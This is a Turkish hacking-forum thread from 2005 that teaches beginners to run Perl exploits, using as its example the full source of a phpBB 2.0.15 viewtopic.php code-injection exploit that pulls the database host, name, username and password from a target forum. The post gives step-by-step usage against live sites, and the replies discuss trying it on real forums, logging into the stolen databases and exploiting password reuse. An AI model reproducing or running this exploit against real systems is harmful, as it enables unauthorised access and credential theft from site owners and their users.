Forum
Aktif konular
Üyeler
Kurallar
Arama
Tahribat.com Forumları 
Hertürlü Web tabanlı Saldırı Taktik ve Stratejileri 
Perl"De Exploit Derlemek... Perl"De Exploit Derlemek...
-
Perl ile Exploit derleme...
Öncelikle Perl'de exploit derlemek için ActivePerli indirin: http://aspn.activestate.com/ASPN/Downloads/ActivePerl/
Kurulum bittiği zaman C:\Perl diye bir dizin çıkacak. Şimdi örnek bir exploitle, exploit derlemeyi anlatacağım..Öncelikle Exploiti txt dosyasına kaydedip farklı kaydetten Perl\bin klasörüne .pl uzantılı olarak koymamız lazım.
.pl uzantı otomatikman Perl dosyasına dönüşmeli, Eğer Text olarak kalıyorsa(perl dosyasıda txt gibi gözukur anlamak için dosyaya sağ tıklayıp özellikler diyin dosya türü yazacaktır. dosya türü: Perl yazması gerekmektedir), Belgelerim üzerindeki Araçlar sekmesinden
Klasör Seçenekleri/Görünüm/Dosyaların gerçek uzantılarını gizle sekmesindeki ticki kaldırın:
*Exploitimizin adı exploitin kodlarında gizlidir. Yanlış adla kaydedersek çalışmaz. Normalde bir exploitin adını öğrenmek için ctrl+a ya basın arama seçeneği çıkacaktır .pl yi aratın, adını göreceksiniz. Mesela aşşağıdaki Exploitin adı phpbbSecureD.pl
bu şekilde kaydedin:#!/usr/bin/perl
# **************************************************************
#**
#** phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability
#** This exploit gives the user all the details about the database
#** connection such as database host, username, password and
#** database name.
#**
#** Written by SecureD, gvr.secured<AT>gmail<DOT>com,2005
#**
#** Greetings to GvR, Jumento, PP, CKrew & friends
#**
# **************************************************************use IO::Socket;
print "+-----------------------------------------------------------------------+\r\n";
print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";
print "| By SecureD gvr.secured<AT>gmail<DOT>com |\r\n";
print "+-----------------------------------------------------------------------+\r\n";if (@ARGV < 3)
{
print "Usage:\r\n";
print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";
print "SERVER - Server where PhpBB is installed.\r\n";
print "DIR - PHPBB directory or / for no directory.\r\n";
print "THREADID - Id of an existing thread.\r\n";
print "COOKIESTRING - Optional, cookie string of the http request.\r\n";
print " Use this when a thread needs authentication for viewing\r\n";
print " You can use Firefox in combination with \"Live HTTP\r\n";
print " Headers\" to get this cookiestring.\r\n\r\n";
print "Example 1 (with cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22
autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22
userid%22%3Bs%3A1%3A%222%22%3B%7D;
phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";
print "Example 2 (without cookiestring):\r\n";
print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";
exit();
}$serv = $ARGV[0];
$dir = $ARGV[1];
$threadid = $ARGV[2];
$cookie = $ARGV[3];$serv =~ s/http:\/\///ge;
$delimit = "GvRSecureD";$sploit = $dir . "viewtopic.php?t=";
$sploit .= $threadid;
$sploit .= "&highlight='.printf($delimit.";
$sploit .= "\$dbhost.";
$sploit .= "$delimit.";
$sploit .= "\$dbname.";
$sploit .= "$delimit.";
$sploit .= "\$dbuser.";
$sploit .= "$delimit.";
$sploit .= "\$dbpasswd.";
$sploit .= "$delimit).'";$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")
or die "[+] Connecting ... Could not connect to host.\n\n";print "[+] Connecting OK\n";
sleep(1);print "[+] Sending exploit ";
print $sock "GET $sploit HTTP/1.1\r\n";
print $sock "Host: $serv\r\n";
if ( defined $cookie) {
print $sock "Cookie: $cookie \r\n";
}
print $sock "Connection: close\r\n\r\n";
$succes = 0;while ($answer = <$sock>) {
$delimitIndex = index $answer, $delimit;
if ($delimitIndex >= 0) {
$succes = 1;
$urlIndex = index $answer, "href";
if ($urlIndex < 0){
$answer = substr($answer, length($delimit));
$length = 0;
while (length($answer) > 0) {
$nex = index($answer, $delimit);
if ($nex > 0) {
push(@array, substr($answer, 0, $nex));
$answer = substr($answer, $nex + length($delimit), length($answer));
} else {
$answer= "";
}
}
}
}
}close($sock);
if ($succes == 1) {
print "OK\n";
sleep(1);
print "[+] Database Host: " . $array[0] . "\n";
sleep(1);
print "[+] Database Name: " . $array[1] . "\n";
sleep(1);
print "[+] Username: " . $array[2] . "\n";
sleep(1);
print "[+] Password: " . $array[3] . "\n";
sleep(1);
} else {
print "FAILED\n";
}Gelelim bu exploiti derlemeye başlat/çalıştır/cmd yazıyoruz siyah bir ekran çıkıyor. Şimdi bizim exploitimiz,
C:\Perl\bin dizininde ama sizin cmd deki komut dizini C:\Documenfalanfilan\useradi şeklinde. Biz Perl\bin dizinine
ulaşmak için "cd.." yazıyoruz ve C:\Documentfalanfilan kalıyor bir daha "cd.." yazıyoruz. C:\ dizini kalıyor.Şimdi "cd Perl" yazıyoruz C:\Perl dizinine ulaşıyor ama biz bin e ulaşacağız bunun için cd bin yazıyoruz. Evet şimdi
Exploitle aynı dizindeyiz buraya daha önceden text dosyasından farklı kaydet diyerek phpbbSecureD.pl olarak kaydedittiğimiz exploiti
derlemek için Perl phpbbSecureD.pl yazıyoruz, bu sayede nasıl kullanılacağını öğreniriz(diğer exploitlerdede böyle) Ama bu exploitin kullanımı
şu şekildedir: Perl phpbbSecureD.pl site ipsi /forumyolu/ 20
*Site ipsini bulmak için başlat/çalıştır/cmd ping www.siteadi.com*örneğin phpbb yolu, www.siteadi.com/forum da ise /forumyolu/ yerine /forum/ yazıyoruz.
*Unutmayın bu exploit sadece phpbb 2.0.15 lerde açık kapatılmamısşa çalışır..
Örnek uygulama:
---------------------------------------------------------------------------------------------------------
Bu dökümanın yeterince açık olduğuna inanıyorum sorularınız sorabilirsiniz. Seer arkadaşıma bana bu işi çok iyi anlattığı için teşekkur ederim, Onun anlatımıyla anlatmaya çalıştım. Alıntı değildir, Seer arkadaşım sayesinde benim tarafımdan dökumana dönüştürülmüştür.
Fistandantilus® -2005
-
bu expolit bize direk admin sifresini mi veriyor dostum
-
truvaa bunu yazdı:
bu expolit bize direk admin sifresini mi veriyor dostum
hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsin -
m3rt bunu yazdı:
hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsin
dışarıdan mySQL'ye nasıl bağlanacaksın ?
-
XhanDros bunu yazdı:
m3rt bunu yazdı:
hyr. database in kullanıcı adı ve şifresini verir. sende db ye bağlanarak herşeyi yapabilirsindışarıdan mySQL'ye nasıl bağlanacaksın ?
database nasıl baglancaz ewer
bi kac siteye girdimde :) sending explolit FAİLED dio :) kapatmıslar dımı
-
Yaw bi ara mysql front diye bi pro görmüştüm. sabah eve gidince atarım rapid e...
-
bununla config.phpnin içeriğine yazılmış kullanıcı acı şifre veritabanı ismini okuyabilirsiniz.
Yanlız veritabanına dışarıdan bağlanmak için önce host admin panelinden %.%.%.% iplerinin bağlanmasına izin verilmesi gerekmektedir. Onun haricinde server bağlantıyı kabul etmez. Ve genellikle o bağlantı default olarak kapalı geldiğinden(Standartta localhost harici bağlantıya izin verilmez.) bağlanamazsınız...
O zaman ne işe yarar bu?
Öyle siteler varki ftp şifresi ile db şifresi aynı oluyor. yada o şifreler başka yerdede kullanılmış oluyor.. Hem bu sadece bir örnek idi :)
-
Bu sitelerden çeşitli exploitler bulabilirsiniz ama C exploitler bu şekilde derlenmez haberiniz olsun :)
http://exploitwatch.org/modules/evennews/archives.php
-
perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.
-
fuzbing bunu yazdı:
perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.
hadiya!!! çok biliyordun sen yazsaydın dökümanı... -
MitNickKevin bunu yazdı:
fuzbing bunu yazdı:
perlde exploit derlenmez çalıştırılır.Ukalalık olarak alma düzeltmek istedim.
hadiya!!! çok biliyordun sen yazsaydın dökümanı...
buranın sazanı senmisin.
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla